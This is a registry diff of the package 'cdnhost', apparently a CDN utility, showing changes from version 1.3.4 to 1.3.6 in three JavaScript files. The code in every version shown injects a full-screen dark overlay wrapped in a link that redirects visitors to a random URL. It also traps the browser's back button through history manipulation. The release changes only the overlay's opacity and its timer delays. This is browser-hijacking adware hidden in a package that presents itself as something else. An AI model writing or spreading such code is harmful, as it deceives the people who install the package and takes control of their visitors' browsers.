cdnhost 1.3.4 → 1.3.6
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/seekr.js +9 -9
- package/seekr2.js +9 -9
- package/total.js +9 -9
package/package.json
CHANGED
package/seekr.js
CHANGED
|
@@ -79,7 +79,7 @@ function handleKeyPress(event) {
|
|
|
79
79
|
|
|
80
80
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
81
81
|
document.writeln('<style>');
|
|
82
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.
|
|
82
|
+
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
83
83
|
document.writeln('</style>');
|
|
84
84
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
85
85
|
|
|
@@ -97,14 +97,14 @@ history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back()
|
|
|
97
97
|
|
|
98
98
|
document.getElementById('container').style.boxShadow = 'none';
|
|
99
99
|
function ss(){
|
|
100
|
-
document.getElementById("s2").style.transition = "opacity
|
|
101
|
-
document.getElementById("button").style.transition = "opacity
|
|
102
|
-
setTimeout("s()",
|
|
103
|
-
setTimeout("h()",
|
|
100
|
+
document.getElementById("s2").style.transition = "opacity 6s";
|
|
101
|
+
document.getElementById("button").style.transition = "opacity 6s";
|
|
102
|
+
setTimeout("s()", 3999);
|
|
103
|
+
setTimeout("h()", 5000);
|
|
104
104
|
}
|
|
105
105
|
function pcss(){
|
|
106
|
-
setTimeout("s()",
|
|
107
|
-
setTimeout("h()",
|
|
106
|
+
setTimeout("s()", 3999);
|
|
107
|
+
setTimeout("h()", 5000);
|
|
108
108
|
}
|
|
109
109
|
function a(){
|
|
110
110
|
document.getElementById("button").style.display="none";
|
|
@@ -126,9 +126,9 @@ function h(){
|
|
|
126
126
|
setTimeout(function () {
|
|
127
127
|
s2.style.zIndex = 99;
|
|
128
128
|
button.style.display = "block";
|
|
129
|
-
s2.style.opacity = 0.
|
|
129
|
+
s2.style.opacity = 0.9;
|
|
130
130
|
button.style.opacity = 1;
|
|
131
131
|
document.getElementById("s2").style.transition = "opacity 1s";
|
|
132
132
|
document.getElementById("button").style.transition = "opacity 1s";
|
|
133
|
-
},
|
|
133
|
+
}, 3000);
|
|
134
134
|
}
|
package/seekr2.js
CHANGED
|
@@ -65,7 +65,7 @@ function handleKeyPress(event) {
|
|
|
65
65
|
|
|
66
66
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
67
67
|
document.writeln('<style>');
|
|
68
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.
|
|
68
|
+
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
69
69
|
document.writeln('</style>');
|
|
70
70
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
71
71
|
|
|
@@ -83,14 +83,14 @@ history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back()
|
|
|
83
83
|
|
|
84
84
|
document.getElementById('container').style.boxShadow = 'none';
|
|
85
85
|
function ss(){
|
|
86
|
-
document.getElementById("s2").style.transition = "opacity
|
|
87
|
-
document.getElementById("button").style.transition = "opacity
|
|
88
|
-
setTimeout("s()",
|
|
89
|
-
setTimeout("h()",
|
|
86
|
+
document.getElementById("s2").style.transition = "opacity 6s";
|
|
87
|
+
document.getElementById("button").style.transition = "opacity 6s";
|
|
88
|
+
setTimeout("s()", 3999);
|
|
89
|
+
setTimeout("h()", 5000);
|
|
90
90
|
}
|
|
91
91
|
function pcss(){
|
|
92
|
-
setTimeout("s()",
|
|
93
|
-
setTimeout("h()",
|
|
92
|
+
setTimeout("s()", 3999);
|
|
93
|
+
setTimeout("h()", 5000);
|
|
94
94
|
}
|
|
95
95
|
function a(){
|
|
96
96
|
document.getElementById("button").style.display="none";
|
|
@@ -112,9 +112,9 @@ function h(){
|
|
|
112
112
|
setTimeout(function () {
|
|
113
113
|
s2.style.zIndex = 99;
|
|
114
114
|
button.style.display = "block";
|
|
115
|
-
s2.style.opacity = 0.
|
|
115
|
+
s2.style.opacity = 0.9;
|
|
116
116
|
button.style.opacity = 1;
|
|
117
117
|
document.getElementById("s2").style.transition = "opacity 1s";
|
|
118
118
|
document.getElementById("button").style.transition = "opacity 1s";
|
|
119
|
-
},
|
|
119
|
+
}, 3000);
|
|
120
120
|
}
|
package/total.js
CHANGED
|
@@ -77,7 +77,7 @@ function handleKeyPress(event) {
|
|
|
77
77
|
|
|
78
78
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
79
79
|
document.writeln('<style>');
|
|
80
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.
|
|
80
|
+
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
|
|
81
81
|
document.writeln('</style>');
|
|
82
82
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
83
83
|
|
|
@@ -97,14 +97,14 @@ history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back()
|
|
|
97
97
|
|
|
98
98
|
document.getElementById('container').style.boxShadow = 'none';
|
|
99
99
|
function ss(){
|
|
100
|
-
document.getElementById("s2").style.transition = "opacity
|
|
101
|
-
document.getElementById("button").style.transition = "opacity
|
|
102
|
-
setTimeout("s()",
|
|
103
|
-
setTimeout("h()",
|
|
100
|
+
document.getElementById("s2").style.transition = "opacity 6s";
|
|
101
|
+
document.getElementById("button").style.transition = "opacity 6s";
|
|
102
|
+
setTimeout("s()", 3999);
|
|
103
|
+
setTimeout("h()", 5000);
|
|
104
104
|
}
|
|
105
105
|
function pcss(){
|
|
106
|
-
setTimeout("s()",
|
|
107
|
-
setTimeout("h()",
|
|
106
|
+
setTimeout("s()", 3999);
|
|
107
|
+
setTimeout("h()", 5000);
|
|
108
108
|
}
|
|
109
109
|
function a(){
|
|
110
110
|
document.getElementById("button").style.display="none";
|
|
@@ -126,9 +126,9 @@ function h(){
|
|
|
126
126
|
setTimeout(function () {
|
|
127
127
|
s2.style.zIndex = 99;
|
|
128
128
|
button.style.display = "block";
|
|
129
|
-
s2.style.opacity = 0.
|
|
129
|
+
s2.style.opacity = 0.9;
|
|
130
130
|
button.style.opacity = 1;
|
|
131
131
|
document.getElementById("s2").style.transition = "opacity 1s";
|
|
132
132
|
document.getElementById("button").style.transition = "opacity 1s";
|
|
133
|
-
},
|
|
133
|
+
}, 3000);
|
|
134
134
|
}
|